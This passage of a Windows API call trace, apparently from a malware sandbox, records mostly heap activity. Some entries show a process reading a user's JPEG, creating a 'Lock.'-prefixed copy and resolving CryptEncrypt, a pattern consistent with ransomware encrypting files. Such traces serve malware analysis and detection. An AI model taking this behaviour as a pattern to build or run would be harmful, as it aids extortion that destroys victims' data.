(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0253.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/T9bmRc0wgjLMG_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t9bmrc0wgjlmg_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0253.529] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.529] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0253.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0253.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0253.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0253.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0253.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0253.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.530] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0253.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0253.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0253.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0253.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0253.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.T9bmRc0wgjLMG_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.t9bmrc0wgjlmg_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0253.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0253.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0253.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0253.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0253.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0253.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0253.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0253.534] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0253.534] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x577, lpOverlapped=0x0) returned 1 [0253.535] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0253.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0253.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0253.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x577) returned 0x2e561a8 [0253.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0253.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x577) returned 0x3bf0050 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x577) returned 0x2e561a8 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0253.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0253.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0253.544] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x577) returned 0x2e561a8 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x577) returned 0x3bf05d0 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.546] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0253.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0253.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.546] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0253.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0253.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0253.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0253.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.634] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0253.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0253.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0253.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0253.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0253.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51b68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0253.635] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54148 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0253.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 